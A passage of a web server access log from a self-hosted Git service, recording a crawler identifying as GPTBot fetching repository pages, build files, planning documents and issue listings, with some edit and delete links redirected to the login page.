Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:17:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp" [Client 74.7.227.38] [Length 83111] [Gzip 12.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9948] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13648] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12740] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:17:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:17:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=source" [Client 74.7.227.38] [Length 14283] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:17:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:17:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=source" [Client 74.7.227.38] [Length 14250] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:17:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9797] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 10745] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10047] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:17:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11596] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36197] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36199] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36199] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:25:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:25:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9952] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10653] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10292] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11957] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:17:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:17:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:17:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:17:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake" -[17/Feb/2026:17:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14323] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11349] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:25:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr 